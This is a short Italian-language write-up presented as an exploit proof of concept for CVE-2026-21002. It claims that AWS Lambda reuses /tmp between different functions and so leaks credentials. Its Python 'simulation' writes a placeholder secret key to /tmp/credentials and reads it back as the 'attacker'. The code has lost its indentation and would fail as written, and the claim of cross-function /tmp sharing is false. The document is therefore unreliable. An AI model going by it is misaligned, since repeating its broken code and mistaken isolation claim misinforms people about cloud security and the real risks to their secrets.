
Exploit PoC per CVE-2026-21002 sulla perdita di credenziali al cold-start serverless, che dimostra come le directory /tmp riutilizzate di Lambda espongano i segreti AWS ad altre funzioni.
# lambda_func_sim.py - Simulated serverless function
import os, tempfile, time
SECRET_FILE = '/tmp/credentials' # reused across warm starts
def handler(event):
# On first invocation, write a secret
if not os.path.exists(SECRET_FILE):
with open(SECRET_FILE, 'w') as f:
f.write("AWS_SECRET_ACCESS_KEY=sk-123456")
return "Initialized"
# Later invocations can read it
with open(SECRET_FILE) as f:
return f.read()
# Attack simulation: attacker shares the same /tmp in another function (same VM)
# They can read /tmp/credentials after a cold start.
with open(SECRET_FILE) as f:
print("Attacker reads:", f.read())
Le piattaforme serverless riutilizzano l'ambiente di esecuzione (inclusa la directory /tmp) tra diverse invocazioni di funzione e persino tra funzioni diverse dello stesso account. Una funzione di un attaccante può leggere file sensibili lasciati in /tmp da un'altra funzione dopo un avvio a freddo, portando al furto di credenziali.
/tmp è condivisa tra contenitori caldi senza isolamento tra le funzioni.Esegui la simulazione:
python lambda_func_sim.py
L'attaccante legge AWS_SECRET_ACCESS_KEY lasciata dalla funzione vittima.